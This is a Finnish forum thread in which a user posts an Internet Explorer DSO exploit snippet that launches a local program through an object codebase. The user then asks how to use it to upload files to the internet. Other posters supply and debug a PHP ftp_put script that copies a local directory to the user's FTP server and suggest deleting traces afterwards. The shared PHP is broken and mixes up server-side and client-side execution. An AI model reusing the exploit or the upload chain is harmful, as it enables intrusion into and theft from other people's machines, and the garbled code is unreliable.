Ku mul olis tällänen DSO Exploit-koodi joka avaa ohjelman etäkoneelta:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:\WINDOWS\System32\calc.exe"></object> ]]> </exploit> </security> </xml>
saisko ton DSO Exploitin kautta jotenki tallennettua nettii tiedostoa? (käy muillaki kielillä sama juttu jos joku tietää)
Tarkoitus olisi siis saada tuo calc.exe nettiin? Onnistuu varmaan käyttämällä ftp_put funktiota.
http://www.pm-netti.com/index.php?sivu=14&script=ftp_put
Jos sinä tallennat tuon ensin kotikoneelle yksikseen omaan kansioonsa, sillä tuo ftp_put kopioi koko hakemiston sisällön palvelimelle.
Aluks mul oli tos jotai 6virhettä kunnes korjailin sitä vähän ja poistin pari kohtaa siit, mut nyt enää 1virhe ja se on:
Parse error: parse error, unexpected T_VARIABLE in /mbnet/s/supercat/testiftphomma/index.php on line 22
oon nii surkee php:ssä etten muista ees enää, että mikä olikaa toi Parse error?
Ton homman lähdekoodi on täl hetkel:
<?php
$ftp_server = "koti.mbnet.fi";
$ftp_user = "supercat";
$ftp_pass = "**********";
$conn_id=ftp_connect($ftp_server);
if (ftp_login($conn_id, $ftp_user, $ftp_pass)) {
echo "Muodostettu etäyhteys $ftp_user@$ftp_server\n";
}
else {
echo "Couldn't connect as $ftp_user\n";
}
$koti_dir = "c:\WINDOWS\system32\calc.exe"; // Kotikoneella oleva kansio
$server_dir = "testiftphomma"; // Palvelimella oleva kansio
function ftp_copy($koti_dir, $server_dir) {
// global $conn_id;
Call $d = dir($koti_dir);
while($file = $d->read()) {
if ($file != "." && $file != "..") {
if (is_dir($koti_dir."/".$file)) {
if (!@ftp_chdir($conn_id, $server_dir."/".$file)) {
ftp_mkdir($conn_id, $server_dir."/".$file);
}
ftp_copy($koti_dir."/".$file, $server_dir."/".$file);
}
else {
$upload = ftp_put($conn_id, $server_dir."/".$file, $koti_dir."/".$file, FTP_BINARY) or exit ("Tiedostojen kopioinnissa vaikeuksia");
}
}
}
$d->close();
} ftp_copy($koti_dir, $server_dir);
echo ("Tiedostot kopioitu palvelimelle");
ftp_close($conn_id);
?>
virhe on tuossa:
koti_dir = "c:\WINDOWS\system32\calc.exe"; // Kotikoneella oleva kansio
Tiedoston nimeä ei tule mainita ollenkaan, vain hakemiston nimi. Mutta muistaakseeni tuossa system32 -kansiossa on muitakin tiedostoja?
Jos sinulla on kotipalvelin, suosittelen tuohon skriptin alkuun esim. tämmöistä:
ja tuohon muutat tuohon $koti_dir="C:/omaftp";
Koodin loppuun voit tehdä vastaavat unlink ja rmdir komennot, niin ei jää turhia roskia...
Eips.. eikös pitäisi vielä olla: copy("c:\\WINDOWS\\system32\\calc.exe", "C:\\omaftp\\calc.exe");
lainaus:
Eips.. eikös pitäisi vielä olla: copy("c:\\WINDOWS\\system32\\calc.exe", "C:\\omaftp\\calc.exe");
Ei välttämättä. Näkyy toimivan hyvin molemmilla.
Aihe on jo aika vanha, joten et voi enää vastata siihen.